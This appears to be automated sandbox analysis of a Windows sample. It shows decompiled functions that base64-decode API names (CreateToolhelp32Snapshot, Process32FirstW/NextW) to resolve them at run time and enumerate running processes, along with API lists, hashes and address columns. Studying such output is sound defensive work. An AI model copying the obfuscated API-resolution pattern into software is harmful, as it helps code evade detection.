                                                                                                                                                                                          0x00416e5e
                                                                                                                                                                                          0x00416e6d
                                                                                                                                                                                          0x00416e7c
                                                                                                                                                                                          0x00416e7c
                                                                                                                                                                                          0x00416e87
                                                                                                                                                                                          0x00416e8c
                                                                                                                                                                                          0x00416e8d
                                                                                                                                                                                          0x00416e8d
                                                                                                                                                                                          0x00416e8d
                                                                                                                                                                                          0x00416dc9
                                                                                                                                                                                          0x00416e98
                                                                                                                                                                                          0x00416e9b
                                                                                                                                                                                          0x00416e9e
                                                                                                                                                                                          0x00416eae
                                                                                                                                                                                          0x00416eb6
                                                                                                                                                                                          0x00416ebe
                                                                                                                                                                                          0x00416ec9

APIs
• LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,), ref: 00416C04
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C0A
• LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,), ref: 00416C32
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C38
• LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2), ref: 00416C77
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00416C7D
• GetCurrentProcessId.KERNEL32(?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,,?,Zone: ,?,004175A8), ref: 00416DAA
Strings
Memory Dump Source
• Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: AddressLibraryLoadProc$CurrentProcess
• String ID: Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90$UHJvY2VzczMyRmlyc3RX$UHJvY2VzczMyTmV4dFc=$a2VybmVsMzIuZGxs$kernel32.dll
• API String ID: 3877065590-4127804628
• Opcode ID: f3f8819d2a06753c8c004d88ffab413edcc893332a2b89064e09e30df0b38323
• Instruction ID: b4fa090e97bfe7a1d5ce5cc441e323bfe92997b970e5e29befa82c83258fdf6c
• Opcode Fuzzy Hash: f3f8819d2a06753c8c004d88ffab413edcc893332a2b89064e09e30df0b38323
• Instruction Fuzzy Hash: B4918574A001099BCB10EF69C985ADEB7B9FF84304F1181BAE509B7291D739DF858F58
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 71%
                                                                                                                                                                                          			E00416B8C(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                          				long _v12;
                                                                                                                                                                                          				signed int _v16;
                                                                                                                                                                                          				char _v17;
                                                                                                                                                                                          				char _v24;
                                                                                                                                                                                          				char _v28;
                                                                                                                                                                                          				char _v584;
                                                                                                                                                                                          				char _v588;
                                                                                                                                                                                          				char _v592;
                                                                                                                                                                                          				char _v596;
                                                                                                                                                                                          				char _v600;
                                                                                                                                                                                          				char _v604;
                                                                                                                                                                                          				char _v608;
                                                                                                                                                                                          				char _v612;
                                                                                                                                                                                          				signed int _t109;
                                                                                                                                                                                          				signed int _t110;
                                                                                                                                                                                          				CHAR* _t115;
                                                                                                                                                                                          				CHAR* _t121;
                                                                                                                                                                                          				CHAR* _t127;
                                                                                                                                                                                          				void* _t139;
                                                                                                                                                                                          				void* _t143;
                                                                                                                                                                                          				void* _t171;
                                                                                                                                                                                          				signed int _t172;
                                                                                                                                                                                          				void* _t173;
                                                                                                                                                                                          				intOrPtr* _t176;
                                                                                                                                                                                          				signed int _t185;
                                                                                                                                                                                          				intOrPtr* _t194;
                                                                                                                                                                                          				void* _t195;
                                                                                                                                                                                          				signed int _t196;
                                                                                                                                                                                          				signed int _t197;
                                                                                                                                                                                          				intOrPtr _t216;
                                                                                                                                                                                          				intOrPtr _t218;
                                                                                                                                                                                          				signed int _t231;
                                                                                                                                                                                          				intOrPtr* _t241;
                                                                                                                                                                                          				signed int _t242;
                                                                                                                                                                                          				signed int _t244;
                                                                                                                                                                                          				void* _t245;
                                                                                                                                                                                          				void* _t246;
                                                                                                                                                                                          				void* _t248;
                                                                                                                                                                                          				intOrPtr _t249;
                                                                                                                                                                                          
                                                                                                                                                                                          				_t240 = __esi;
                                                                                                                                                                                          				_t109 = __eax +  *__eax;
                                                                                                                                                                                          				 *_t109 =  *_t109 + _t109;
                                                                                                                                                                                          				_t110 = _t109 | 0x5500000a;
                                                                                                                                                                                          				_t247 = _t248;
                                                                                                                                                                                          				_t249 = _t248 + 0xfffffda0;
                                                                                                                                                                                          				_v612 = 0;
                                                                                                                                                                                          				_v608 = 0;
                                                                                                                                                                                          				_v604 = 0;
                                                                                                                                                                                          				_v596 = 0;
                                                                                                                                                                                          				_v600 = 0;
                                                                                                                                                                                          				_v592 = 0;
                                                                                                                                                                                          				_v588 = 0;
                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                          				_v24 = 0;
                                                                                                                                                                                          				_v16 = _t110;
                                                                                                                                                                                          				 *[fs:eax] = _t249;
                                                                                                                                                                                          				E00406984("Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90", __ebx,  &_v588, __edi, __esi);
                                                                                                                                                                                          				_t115 = E00403990(_v588);
                                                                                                                                                                                          				_t194 = GetProcAddress(LoadLibraryA("kernel32.dll"), _t115);
                                                                                                                                                                                          				E00406984("UHJvY2VzczMyRmlyc3RX", _t194,  &_v592, __edi, __esi);
                                                                                                                                                                                          				_t121 = E00403990(_v592);
                                                                                                                                                                                          				_t237 = GetProcAddress(LoadLibraryA("kernel32.dll"), _t121);
                                                                                                                                                                                          				E00406984("UHJvY2VzczMyTmV4dFc=", _t194,  &_v596, _t237, __esi);
                                                                                                                                                                                          				_t127 = E00403990(_v596);
                                                                                                                                                                                          				E00406984("a2VybmVsMzIuZGxs", _t194,  &_v600, _t237, _t240);
                                                                                                                                                                                          				_t241 = GetProcAddress(LoadLibraryA(E00403990(_v600)), _t127);
                                                                                                                                                                                          				E004034E4(_v16);
                                                                                                                                                                                          				_t195 =  *_t194(2, 0,  *[fs:eax], 0x416eca, _t248, __edi, __esi, __ebx, _t246);
                                                                                                                                                                                          				if(_t195 != 0xffffffff) {
                                                                                                                                                                                          					_v584 = 0x22c;
                                                                                                                                                                                          					_push( &_v584);
                                                                                                                                                                                          					_push(_t195);
                                                                                                                                                                                          					if( *_t237() != 0) {
                                                                                                                                                                                          						do {
                                                                                                                                                                                          							_push(E004045EC(_v8) + 1);
                                                                                                                                                                                          							E004047A8();
                                                                                                                                                                                          							_t185 = E004045EC(_v8);
                                                                                                                                                                                          							_t245 =  &_v584;
                                                                                                                                                                                          							memcpy(_v8 + _t185 * 0x8b * 4 - 0x22c, _t245, 0x8b << 2);
                                                                                                                                                                                          							_t249 = _t249 + 0x10;
                                                                                                                                                                                          							_t237 = _t245 + 0x116;
                                                                                                                                                                                          							_t241 = _t241;
                                                                                                                                                                                          							 *((intOrPtr*)(_v8 + E004045EC(_v8) * 0x8b * 4 - 0x20c)) = 0;
                                                                                                                                                                                          							_push( &_v584);
                                                                                                                                                                                          							_push(_t195);
                                                                                                                                                                                          						} while ( *_t241() != 0);
                                                                                                                                                                                          					}
                                                                                                                                                                                          					_t176 =  *0x41b57c; // 0x41c690
                                                                                                                                                                                          					 *((intOrPtr*)( *_t176))(_t195);
                                                                                                                                                                                          				}
                                                                                                                                                                                          				_t139 = E004045EC(_v8) - 1;
                                                                                                                                                                                          				if(_t139 >= 0) {
                                                                                                                                                                                          					_v28 = _t139 + 1;
                                                                                                                                                                                          					_t197 = 0;
                                                                                                                                                                                          					do {
                                                                                                                                                                                          						_v17 = 1;
                                                                                                                                                                                          						_t171 = E004045EC(_v8) - 1;
                                                                                                                                                                                          						if(_t171 >= 0) {
                                                                                                                                                                                          							_t173 = _t171 + 1;
                                                                                                                                                                                          							_t231 = 0;
                                                                                                                                                                                          							do {
                                                                                                                                                                                          								_t43 = _t197 * 0x8b * 4; // 0x0
                                                                                                                                                                                          								_t244 = _t231 * 0x8b;
                                                                                                                                                                                          								_t237 = _v8;
                                                                                                                                                                                          								_t47 = _t244 * 4; // 0x1ffff
                                                                                                                                                                                          								if( *((intOrPtr*)(_v8 + _t43 + 0x18)) ==  *((intOrPtr*)(_v8 + _t47 + 8))) {
                                                                                                                                                                                          									_v17 = 0;
                                                                                                                                                                                          								}
                                                                                                                                                                                          								_t231 = _t231 + 1;
                                                                                                                                                                                          								_t173 = _t173 - 1;
                                                                                                                                                                                          							} while (_t173 != 0);
                                                                                                                                                                                          						}
                                                                                                                                                                                          						_t172 = _t197 * 0x8b;
                                                                                                                                                                                          						_t52 = _t172 * 4; // 0x0
                                                                                                                                                                                          						_t56 = _t172 * 4; // 0x1ffff
                                                                                                                                                                                          						if( *((intOrPtr*)(_v8 + _t52 + 0x18)) ==  *((intOrPtr*)(_v8 + _t56 + 8))) {
                                                                                                                                                                                          							_v17 = 1;
                                                                                                                                                                                          						}
                                                                                                                                                                                          						if(_v17 == 1) {
                                                                                                                                                                                          							 *((intOrPtr*)(_v8 + 0x20 + _t172 * 4)) = 1;
                                                                                                                                                                                          						}
                                                                                                                                                                                          						_t197 = _t197 + 1;
                                                                                                                                                                                          						_t64 =  &_v28;
                                                                                                                                                                                          						 *_t64 = _v28 - 1;
                                                                                                                                                                                          					} while ( *_t64 != 0);
                                                                                                                                                                                          				}
                                                                                                                                                                                          				_v12 = GetCurrentProcessId();
                                                                                                                                                                                          				_t143 = E004045EC(_v8) - 1;
                                                                                                                                                                                          				if(_t143 >= 0) {
                                                                                                                                                                                          					_v28 = _t143 + 1;
                                                                                                                                                                                          					_t196 = 0;
                                                                                                                                                                                          					do {
                                                                                                                                                                                          						_t242 = _t196 * 0x8b;
                                                                                                                                                                                          						if( *((intOrPtr*)(_v8 + 0x20 + _t242 * 4)) == 1) {
                                                                                                                                                                                          							_t75 = _t242 * 4; // 0x1ffff
                                                                                                                                                                                          							if( *((intOrPtr*)(_v8 + _t75 + 8)) != _v12) {
                                                                                                                                                                                          								_push(_v24);
                                                                                                                                                                                          								_t90 = _t242 * 4; // 0x0
                                                                                                                                                                                          								E00403760( &_v608, 0x104, _v8 + _t90 + 0x24);
                                                                                                                                                                                          								_push(_v608);
                                                                                                                                                                                          								_push(E00416F84);
                                                                                                                                                                                          								E00403850();
                                                                                                                                                                                          							} else {
                                                                                                                                                                                          								_push(_v24);
                                                                                                                                                                                          								_t82 = _t242 * 4; // 0x0
                                                                                                                                                                                          								E00403760( &_v604, 0x104, _v8 + _t82 + 0x24);
                                                                                                                                                                                          								_push(_v604);
                                                                                                                                                                                          								_push(0x416f78);
                                                                                                                                                                                          								_push(E00416F84);
                                                                                                                                                                                          								E00403850();
                                                                                                                                                                                          							}
                                                                                                                                                                                          							_t96 = _t196 * 0x8b * 4; // 0x1ffff
                                                                                                                                                                                          							E004169F0( *((intOrPtr*)(_v8 + _t96 + 8)), _t196,  &_v612, 1, _t237, _t242, _t247);
                                                                                                                                                                                          							E00403798( &_v24, _v612);
                                                                                                                                                                                          						}
                                                                                                                                                                                          						E00403538(_v16, _v24);
                                                                                                                                                                                          						_t196 = _t196 + 1;
                                                                                                                                                                                          						_t103 =  &_v28;
                                                                                                                                                                                          						 *_t103 = _v28 - 1;
                                                                                                                                                                                          					} while ( *_t103 != 0);
                                                                                                                                                                                          				}
                                                                                                                                                                                          				_pop(_t216);
                                                                                                                                                                                          				 *[fs:eax] = _t216;
                                                                                                                                                                                          				_push(E00416ED1);
                                                                                                                                                                                          				E00403508( &_v612, 7);
                                                                                                                                                                                          				E004034E4( &_v24);
                                                                                                                                                                                          				_t218 =  *0x4169c8; // 0x4169cc
                                                                                                                                                                                          				return E004047B4( &_v8, _t218);
                                                                                                                                                                                          			}











































                                                                                                                                                                                          0x00416d52
                                                                                                                                                                                          0x00416d53
                                                                                                                                                                                          0x00416d55
                                                                                                                                                                                          0x00416d5e
                                                                                                                                                                                          0x00416d62
                                                                                                                                                                                          0x00416d68
                                                                                                                                                                                          0x00416d6b
                                                                                                                                                                                          0x00416d6f
                                                                                                                                                                                          0x00416d71
                                                                                                                                                                                          0x00416d71
                                                                                                                                                                                          0x00416d75
                                                                                                                                                                                          0x00416d76
                                                                                                                                                                                          0x00416d76
                                                                                                                                                                                          0x00416d55
                                                                                                                                                                                          0x00416d79
                                                                                                                                                                                          0x00416d82
                                                                                                                                                                                          0x00416d89
                                                                                                                                                                                          0x00416d8d
                                                                                                                                                                                          0x00416d8f
                                                                                                                                                                                          0x00416d8f
                                                                                                                                                                                          0x00416d97
                                                                                                                                                                                          0x00416d9c
                                                                                                                                                                                          0x00416d9c
                                                                                                                                                                                          0x00416da4
                                                                                                                                                                                          0x00416da5
                                                                                                                                                                                          0x00416da5
                                                                                                                                                                                          0x00416da5
                                                                                                                                                                                          0x00416d41
                                                                                                                                                                                          0x00416daf
                                                                                                                                                                                          0x00416dba
                                                                                                                                                                                          0x00416dbd
                                                                                                                                                                                          0x00416dc4
                                                                                                                                                                                          0x00416dc7
                                                                                                                                                                                          0x00416dc9
                                                                                                                                                                                          0x00416dc9
                                                                                                                                                                                          0x00416dd7
                                                                                                                                                                                          0x00416de0
                                                                                                                                                                                          0x00416de7
                                                                                                                                                                                          0x00416e22
                                                                                                                                                                                          0x00416e2e
                                                                                                                                                                                          0x00416e37
                                                                                                                                                                                          0x00416e3c
                                                                                                                                                                                          0x00416e42
                                                                                                                                                                                          0x00416e4f
                                                                                                                                                                                          0x00416de9
                                                                                                                                                                                          0x00416de9
                                                                                                                                                                                          0x00416df5
                                                                                                                                                                                          0x00416dfe
                                                                                                                                                                                          0x00416e03
                                                                                                                                                                                          0x00416e09
                                                                                                                                                                                          0x00416e0e
                                                                                                                                                                                          0x00416e1b
                                                                                                                                                                                          0x00416e1b
                                                                                                                                                                                          0x00416e5e
                                                                                                                                                                                          0x00416e6d
                                                                                                                                                                                          0x00416e7c
                                                                                                                                                                                          0x00416e7c
                                                                                                                                                                                          0x00416e87
                                                                                                                                                                                          0x00416e8c
                                                                                                                                                                                          0x00416e8d
                                                                                                                                                                                          0x00416e8d
                                                                                                                                                                                          0x00416e8d
                                                                                                                                                                                          0x00416dc9
                                                                                                                                                                                          0x00416e98
                                                                                                                                                                                          0x00416e9b
                                                                                                                                                                                          0x00416e9e
                                                                                                                                                                                          0x00416eae
                                                                                                                                                                                          0x00416eb6
                                                                                                                                                                                          0x00416ebe
                                                                                                                                                                                          0x00416ec9

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,), ref: 00416C04
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C0A
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,), ref: 00416C32
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C38
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2), ref: 00416C77
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00416C7D
                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,,?,Zone: ,?,004175A8), ref: 00416DAA
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressLibraryLoadProc$CurrentProcess
                                                                                                                                                                                          • String ID: Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90$UHJvY2VzczMyRmlyc3RX$UHJvY2VzczMyTmV4dFc=$a2VybmVsMzIuZGxs$kernel32.dll
                                                                                                                                                                                          • API String ID: 3877065590-4127804628
                                                                                                                                                                                          • Opcode ID: 875a9f34e7222272479a6dad8a5508aed50dcbee07cd349c5d72faaa483ea699
                                                                                                                                                                                          • Instruction ID: f3c24ddc2a443a78fd4165323e7ca93df30f075cb4f00a4e444516d0c24f858d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 875a9f34e7222272479a6dad8a5508aed50dcbee07cd349c5d72faaa483ea699
                                                                                                                                                                                          • Instruction Fuzzy Hash: FB917570A006099BCB10EF69C985ADEB7B9FF84304F1181BAE509B7291D739DF858F58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 71%
                                                                                                                                                                                          			E00416B90(signed int __eax, void* __ebx, void* __edi, void* __esi) {
                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                          				long _v12;
                                                                                                                                                                                          				signed int _v16;
                                                                                                                                                                                          				char _v17;
                                                                                                                                                                                          				char _v24;
                                                                                                                                                                                          				char _v28;
                                                                                                                                                                                          				char _v584;
                                                                                                                                                                                          				char _v588;
                                                                                                                                                                                          				char _v592;
                                                                                                                                                                                          				char _v596;
                                                                                                                                                                                          				char _v600;
                                                                                                                                                                                          				char _v604;
                                                                                                                                                                                          				char _v608;
                                                                                                                                                                                          				char _v612;
                                                                                                                                                                                          				signed int _t109;
                                                                                                                                                                                          				CHAR* _t114;
                                                                                                                                                                                          				CHAR* _t120;
                                                                                                                                                                                          				CHAR* _t126;
                                                                                                                                                                                          				void* _t138;
                                                                                                                                                                                          				void* _t142;
                                                                                                                                                                                          				void* _t170;
                                                                                                                                                                                          				signed int _t171;
                                                                                                                                                                                          				void* _t172;
                                                                                                                                                                                          				intOrPtr* _t175;
                                                                                                                                                                                          				signed int _t184;
                                                                                                                                                                                          				intOrPtr* _t193;
                                                                                                                                                                                          				void* _t194;
                                                                                                                                                                                          				signed int _t195;
                                                                                                                                                                                          				signed int _t196;
                                                                                                                                                                                          				intOrPtr _t215;
                                                                                                                                                                                          				intOrPtr _t217;
                                                                                                                                                                                          				signed int _t230;
                                                                                                                                                                                          				intOrPtr* _t240;
                                                                                                                                                                                          				signed int _t241;
                                                                                                                                                                                          				signed int _t243;
                                                                                                                                                                                          				void* _t244;
                                                                                                                                                                                          				void* _t245;
                                                                                                                                                                                          				void* _t247;
                                                                                                                                                                                          				intOrPtr _t248;
                                                                                                                                                                                          
                                                                                                                                                                                          				_t239 = __esi;
                                                                                                                                                                                          				_t109 = __eax | 0x5500000a;
                                                                                                                                                                                          				_t246 = _t247;
                                                                                                                                                                                          				_t248 = _t247 + 0xfffffda0;
                                                                                                                                                                                          				_v612 = 0;
                                                                                                                                                                                          				_v608 = 0;
                                                                                                                                                                                          				_v604 = 0;
                                                                                                                                                                                          				_v596 = 0;
                                                                                                                                                                                          				_v600 = 0;
                                                                                                                                                                                          				_v592 = 0;
                                                                                                                                                                                          				_v588 = 0;
                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                          				_v24 = 0;
                                                                                                                                                                                          				_v16 = _t109;
                                                                                                                                                                                          				 *[fs:eax] = _t248;
                                                                                                                                                                                          				E00406984("Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90", __ebx,  &_v588, __edi, __esi);
                                                                                                                                                                                          				_t114 = E00403990(_v588);
                                                                                                                                                                                          				_t193 = GetProcAddress(LoadLibraryA("kernel32.dll"), _t114);
                                                                                                                                                                                          				E00406984("UHJvY2VzczMyRmlyc3RX", _t193,  &_v592, __edi, __esi);
                                                                                                                                                                                          				_t120 = E00403990(_v592);
                                                                                                                                                                                          				_t236 = GetProcAddress(LoadLibraryA("kernel32.dll"), _t120);
                                                                                                                                                                                          				E00406984("UHJvY2VzczMyTmV4dFc=", _t193,  &_v596, _t236, __esi);
                                                                                                                                                                                          				_t126 = E00403990(_v596);
                                                                                                                                                                                          				E00406984("a2VybmVsMzIuZGxs", _t193,  &_v600, _t236, _t239);
                                                                                                                                                                                          				_t240 = GetProcAddress(LoadLibraryA(E00403990(_v600)), _t126);
                                                                                                                                                                                          				E004034E4(_v16);
                                                                                                                                                                                          				_t194 =  *_t193(2, 0,  *[fs:eax], 0x416eca, _t247, __edi, __esi, __ebx, _t245);
                                                                                                                                                                                          				if(_t194 != 0xffffffff) {
                                                                                                                                                                                          					_v584 = 0x22c;
                                                                                                                                                                                          					_push( &_v584);
                                                                                                                                                                                          					_push(_t194);
                                                                                                                                                                                          					if( *_t236() != 0) {
                                                                                                                                                                                          						do {
                                                                                                                                                                                          							_push(E004045EC(_v8) + 1);
                                                                                                                                                                                          							E004047A8();
                                                                                                                                                                                          							_t184 = E004045EC(_v8);
                                                                                                                                                                                          							_t244 =  &_v584;
                                                                                                                                                                                          							memcpy(_v8 + _t184 * 0x8b * 4 - 0x22c, _t244, 0x8b << 2);
                                                                                                                                                                                          							_t248 = _t248 + 0x10;
                                                                                                                                                                                          							_t236 = _t244 + 0x116;
                                                                                                                                                                                          							_t240 = _t240;
                                                                                                                                                                                          							 *((intOrPtr*)(_v8 + E004045EC(_v8) * 0x8b * 4 - 0x20c)) = 0;
                                                                                                                                                                                          							_push( &_v584);
                                                                                                                                                                                          							_push(_t194);
                                                                                                                                                                                          						} while ( *_t240() != 0);
                                                                                                                                                                                          					}
                                                                                                                                                                                          					_t175 =  *0x41b57c; // 0x41c690
                                                                                                                                                                                          					 *((intOrPtr*)( *_t175))(_t194);
                                                                                                                                                                                          				}
                                                                                                                                                                                          				_t138 = E004045EC(_v8) - 1;
                                                                                                                                                                                          				if(_t138 >= 0) {
                                                                                                                                                                                          					_v28 = _t138 + 1;
                                                                                                                                                                                          					_t196 = 0;
                                                                                                                                                                                          					do {
                                                                                                                                                                                          						_v17 = 1;
                                                                                                                                                                                          						_t170 = E004045EC(_v8) - 1;
                                                                                                                                                                                          						if(_t170 >= 0) {
                                                                                                                                                                                          							_t172 = _t170 + 1;
                                                                                                                                                                                          							_t230 = 0;
                                                                                                                                                                                          							do {
                                                                                                                                                                                          								_t43 = _t196 * 0x8b * 4; // 0x0
                                                                                                                                                                                          								_t243 = _t230 * 0x8b;
                                                                                                                                                                                          								_t236 = _v8;
                                                                                                                                                                                          								_t47 = _t243 * 4; // 0x1ffff
                                                                                                                                                                                          								if( *((intOrPtr*)(_v8 + _t43 + 0x18)) ==  *((intOrPtr*)(_v8 + _t47 + 8))) {
                                                                                                                                                                                          									_v17 = 0;
                                                                                                                                                                                          								}
                                                                                                                                                                                          								_t230 = _t230 + 1;
                                                                                                                                                                                          								_t172 = _t172 - 1;
                                                                                                                                                                                          							} while (_t172 != 0);
                                                                                                                                                                                          						}
                                                                                                                                                                                          						_t171 = _t196 * 0x8b;
                                                                                                                                                                                          						_t52 = _t171 * 4; // 0x0
                                                                                                                                                                                          						_t56 = _t171 * 4; // 0x1ffff
                                                                                                                                                                                          						if( *((intOrPtr*)(_v8 + _t52 + 0x18)) ==  *((intOrPtr*)(_v8 + _t56 + 8))) {
                                                                                                                                                                                          							_v17 = 1;
                                                                                                                                                                                          						}
                                                                                                                                                                                          						if(_v17 == 1) {
                                                                                                                                                                                          							 *((intOrPtr*)(_v8 + 0x20 + _t171 * 4)) = 1;
                                                                                                                                                                                          						}
                                                                                                                                                                                          						_t196 = _t196 + 1;
                                                                                                                                                                                          						_t64 =  &_v28;
                                                                                                                                                                                          						 *_t64 = _v28 - 1;
                                                                                                                                                                                          					} while ( *_t64 != 0);
                                                                                                                                                                                          				}
                                                                                                                                                                                          				_v12 = GetCurrentProcessId();
                                                                                                                                                                                          				_t142 = E004045EC(_v8) - 1;
                                                                                                                                                                                          				if(_t142 >= 0) {
                                                                                                                                                                                          					_v28 = _t142 + 1;
                                                                                                                                                                                          					_t195 = 0;
                                                                                                                                                                                          					do {
                                                                                                                                                                                          						_t241 = _t195 * 0x8b;
                                                                                                                                                                                          						if( *((intOrPtr*)(_v8 + 0x20 + _t241 * 4)) == 1) {
                                                                                                                                                                                          							_t75 = _t241 * 4; // 0x1ffff
                                                                                                                                                                                          							if( *((intOrPtr*)(_v8 + _t75 + 8)) != _v12) {
                                                                                                                                                                                          								_push(_v24);
                                                                                                                                                                                          								_t90 = _t241 * 4; // 0x0
                                                                                                                                                                                          								E00403760( &_v608, 0x104, _v8 + _t90 + 0x24);
                                                                                                                                                                                          								_push(_v608);
                                                                                                                                                                                          								_push(E00416F84);
                                                                                                                                                                                          								E00403850();
                                                                                                                                                                                          							} else {
                                                                                                                                                                                          								_push(_v24);
                                                                                                                                                                                          								_t82 = _t241 * 4; // 0x0
                                                                                                                                                                                          								E00403760( &_v604, 0x104, _v8 + _t82 + 0x24);
                                                                                                                                                                                          								_push(_v604);
                                                                                                                                                                                          								_push(0x416f78);
                                                                                                                                                                                          								_push(E00416F84);
                                                                                                                                                                                          								E00403850();
                                                                                                                                                                                          							}
                                                                                                                                                                                          							_t96 = _t195 * 0x8b * 4; // 0x1ffff
                                                                                                                                                                                          							E004169F0( *((intOrPtr*)(_v8 + _t96 + 8)), _t195,  &_v612, 1, _t236, _t241, _t246);
                                                                                                                                                                                          							E00403798( &_v24, _v612);
                                                                                                                                                                                          						}
                                                                                                                                                                                          						E00403538(_v16, _v24);
                                                                                                                                                                                          						_t195 = _t195 + 1;
                                                                                                                                                                                          						_t103 =  &_v28;
                                                                                                                                                                                          						 *_t103 = _v28 - 1;
                                                                                                                                                                                          					} while ( *_t103 != 0);
                                                                                                                                                                                          				}
                                                                                                                                                                                          				_pop(_t215);
                                                                                                                                                                                          				 *[fs:eax] = _t215;
                                                                                                                                                                                          				_push(E00416ED1);
                                                                                                                                                                                          				E00403508( &_v612, 7);
                                                                                                                                                                                          				E004034E4( &_v24);
                                                                                                                                                                                          				_t217 =  *0x4169c8; // 0x4169cc
                                                                                                                                                                                          				return E004047B4( &_v8, _t217);
                                                                                                                                                                                          			}

                                                                                                                                                                                          0x00416d1d
                                                                                                                                                                                          0x00416d20
                                                                                                                                                                                          0x00416cb5
                                                                                                                                                                                          0x00416d25
                                                                                                                                                                                          0x00416d2c
                                                                                                                                                                                          0x00416d2c
                                                                                                                                                                                          0x00416d36
                                                                                                                                                                                          0x00416d39
                                                                                                                                                                                          0x00416d3c
                                                                                                                                                                                          0x00416d3f
                                                                                                                                                                                          0x00416d41
                                                                                                                                                                                          0x00416d41
                                                                                                                                                                                          0x00416d4d
                                                                                                                                                                                          0x00416d50
                                                                                                                                                                                          0x00416d52
                                                                                                                                                                                          0x00416d53
                                                                                                                                                                                          0x00416d55
                                                                                                                                                                                          0x00416d5e
                                                                                                                                                                                          0x00416d62
                                                                                                                                                                                          0x00416d68
                                                                                                                                                                                          0x00416d6b
                                                                                                                                                                                          0x00416d6f
                                                                                                                                                                                          0x00416d71
                                                                                                                                                                                          0x00416d71
                                                                                                                                                                                          0x00416d75
                                                                                                                                                                                          0x00416d76
                                                                                                                                                                                          0x00416d76
                                                                                                                                                                                          0x00416d55
                                                                                                                                                                                          0x00416d79
                                                                                                                                                                                          0x00416d82
                                                                                                                                                                                          0x00416d89
                                                                                                                                                                                          0x00416d8d
                                                                                                                                                                                          0x00416d8f
                                                                                                                                                                                          0x00416d8f
                                                                                                                                                                                          0x00416d97
                                                                                                                                                                                          0x00416d9c
                                                                                                                                                                                          0x00416d9c
                                                                                                                                                                                          0x00416da4
                                                                                                                                                                                          0x00416da5
                                                                                                                                                                                          0x00416da5
                                                                                                                                                                                          0x00416da5
                                                                                                                                                                                          0x00416d41
                                                                                                                                                                                          0x00416daf
                                                                                                                                                                                          0x00416dba
                                                                                                                                                                                          0x00416dbd
                                                                                                                                                                                          0x00416dc4
                                                                                                                                                                                          0x00416dc7
                                                                                                                                                                                          0x00416dc9
                                                                                                                                                                                          0x00416dc9
                                                                                                                                                                                          0x00416dd7
                                                                                                                                                                                          0x00416de0
                                                                                                                                                                                          0x00416de7
                                                                                                                                                                                          0x00416e22
                                                                                                                                                                                          0x00416e2e
                                                                                                                                                                                          0x00416e37
                                                                                                                                                                                          0x00416e3c
                                                                                                                                                                                          0x00416e42
                                                                                                                                                                                          0x00416e4f
                                                                                                                                                                                          0x00416de9
                                                                                                                                                                                          0x00416de9
                                                                                                                                                                                          0x00416df5
                                                                                                                                                                                          0x00416dfe
                                                                                                                                                                                          0x00416e03
                                                                                                                                                                                          0x00416e09
                                                                                                                                                                                          0x00416e0e
                                                                                                                                                                                          0x00416e1b
                                                                                                                                                                                          0x00416e1b
                                                                                                                                                                                          0x00416e5e
                                                                                                                                                                                          0x00416e6d
                                                                                                                                                                                          0x00416e7c
                                                                                                                                                                                          0x00416e7c
                                                                                                                                                                                          0x00416e87
                                                                                                                                                                                          0x00416e8c
                                                                                                                                                                                          0x00416e8d
                                                                                                                                                                                          0x00416e8d
                                                                                                                                                                                          0x00416e8d
                                                                                                                                                                                          0x00416dc9
                                                                                                                                                                                          0x00416e98
                                                                                                                                                                                          0x00416e9b
                                                                                                                                                                                          0x00416e9e
                                                                                                                                                                                          0x00416eae
                                                                                                                                                                                          0x00416eb6
                                                                                                                                                                                          0x00416ebe
                                                                                                                                                                                          0x00416ec9

APIs
• LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,), ref: 00416C04
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C0A
